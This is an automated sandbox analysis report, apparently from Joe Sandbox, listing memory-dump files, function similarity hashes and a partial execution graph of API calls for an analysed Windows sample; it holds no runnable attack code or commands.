                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                        • Instruction ID: 853a721ce2fe648d865a30a75f1a1362272e4078b836a4e21938d6083b1e74f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E08C32911228EBCB28DB88C904DAAF3ECEB48B10B110096F601D3200C3B0DF00C7D0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00BB8829 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: a5a757ab4249c1b823d79b006f25eb88b634771f80b439923f4b85943bf968f7
                                                                                                                                                                                                                                        • Instruction ID: 36cc1f5fafdac245c6703a2ecd5a9d4d338a5271674268a721ce7974f742ed3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5a757ab4249c1b823d79b006f25eb88b634771f80b439923f4b85943bf968f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0701C477A046262726142018AC026BB57DCDBC1BB072A00AEFC44F72D1FFD9DC02D594
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B82DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: 2cc06a32e33adb1919f8e167e722532a6364983e34ddb7b07eaa73e744dad334
                                                                                                                                                                                                                                        • Instruction ID: e740f091366d2521abfda5865a244a81a1317f2ae7b10cc8fe65a2dc113ce43c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cc06a32e33adb1919f8e167e722532a6364983e34ddb7b07eaa73e744dad334
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9A1EF70A00206AFDF21EB69C944B5AB7F8FF15714F1481B9E915D72A2EB34EA04CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B9D202 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: b937c37c902d0a52ba7d0c9503ef2c458f1f8a0b8a238071bf32596a1cb99ef3
                                                                                                                                                                                                                                        • Instruction ID: 3257f617a6fce0bb3f5f41653168d4162cacd5492257e50c9ea788a20124b150
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b937c37c902d0a52ba7d0c9503ef2c458f1f8a0b8a238071bf32596a1cb99ef3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20213E75A002199FDF00EFA5DC819BEBBB8FF59714F1000A9FA01A7251DB749D019BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:0.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:698
                                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                                        execution_graph 10525 702070 10528 71dd8c 10525->10528 10527 70207a 10529 71ddb4 10528->10529 10530 71dd9c 10528->10530 10529->10527 10530->10529 10532 71e64e 10530->10532 10535 71e365 10532->10535 10536 71e373 InitializeCriticalSectionEx 10535->10536 10537 71e388 10535->10537 10536->10537 10537->10530 10539 706a70 10540 706aa2 10539->10540 10549 737cf0 10540->10549 10545 737ccf 3 API calls 10546 706abf 10545->10546 10547 737ccf 3 API calls 10546->10547 10548 706ad7 10547->10548 10555 73bc91 10549->10555 10552 737ccf 10553 73bc91 __cftof 3 API calls 10552->10553 10554 706ab0 10553->10554 10554->10545 10559 73bc9b __dosmaperr __freea 10555->10559 10556 706aa8 10556->10552 10559->10556 10560 73a20f 10559->10560 10561 73a214 __cftof 10560->10561 10565 73a21f __cftof 10561->10565 10566 73ec54 10561->10566 10580 737c7d 10565->10580 10567 73ec60 __cftof __dosmaperr 10566->10567 10568 73ed46 10567->10568 10569 73ee3b __dosmaperr 10567->10569 10570 73ed71 __cftof 10567->10570 10579 73ecbc __cftof __dosmaperr 10567->10579 10568->10570 10583 73ec4b 10568->10583 10571 737c7d __cftof 3 API calls 10569->10571 10574 73bc91 __cftof 3 API calls 10570->10574 10577 73edc5 10570->10577 10570->10579 10572 73ee4e 10571->10572 10574->10577 10576 73ec4b __cftof 3 API calls 10576->10570 10578 73bc91 __cftof 3 API calls 10577->10578 10577->10579 10578->10579 10579->10565 10581 737b57 __cftof 3 API calls 10580->10581 10582 737c8e 10581->10582 10584 73bc91 __cftof 3 API calls 10583->10584 10585 73ec50 10584->10585 10585->10576 11328 7041b0 11331 7039c0 11328->11331 11330 7041bb shared_ptr 11332 7039f9 11331->11332 11333 7031d0 5 API calls 11332->11333 11335 703b38 11332->11335 11337 703a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11332->11337 11333->11335 11334 7031d0 5 API calls 11338 703b5f 11334->11338 11335->11334 11335->11338 11336 703b68 11336->11330 11337->11330 11338->11336 11339 703710 3 API calls 11338->11339 11340 703bdb 11339->11340 10785 702034 10788 71dd1b 10785->10788 10787 702040 10791 71da65 10788->10791 10790 71dd2b 10790->10787 10792 71da71 10791->10792 10793 71da7b 10791->10793 10794 71da4e 10792->10794 10795 71da2e 10792->10795 10793->10790 10800 71e39a 10794->10800 10795->10793 10798 71e365 __Mtx_init_in_situ InitializeCriticalSectionEx 10795->10798 10797 71da60 10797->10790 10799 71da47 10798->10799 10799->10790 10801 71e3af RtlInitializeConditionVariable 10800->10801 10801->10797 11245 704176 11246 702310 4 API calls 11245->11246 11247 70417f 11246->11247 10509 737cb9 10512 737b57 10509->10512 10513 737b65 __cftof 10512->10513 10514 737bb0 10513->10514 10517 737bbb 10513->10517 10516 737bba 10523 73b922 GetPEB 10517->10523 10519 737bc5 10520 737bca GetPEB 10519->10520 10522 737bda __cftof 10519->10522 10520->10522 10521 737bf2 ExitProcess 10522->10521 10524 73b93c __cftof 10523->10524 10524->10519 10802 704020 10803 70406a 10802->10803 10805 7040b2 std::invalid_argument::invalid_argument 10803->10805 10806 703de0 10803->10806 10807 703e48 10806->10807 10810 703e1e 10806->10810 10808 703e58 10807->10808 10812 702b00 10807->10812 10808->10805 10810->10805 10813 702b0e 10812->10813 10819 71ced7 10813->10819 10815 702b42 10816 702b49 10815->10816 10825 702b80 10815->10825 10816->10805 10818 702b58 Concurrency::cancel_current_task 10820 71cee4 10819->10820 10823 71cf03 Concurrency::details::_Reschedule_chore 10819->10823 10828 71e207 10820->10828 10822 71cef4 10822->10823 10830 71ceae 10822->10830 10823->10815 10836 71ce8b 10825->10836 10827 702bb2 shared_ptr 10827->10818 10829 71e222 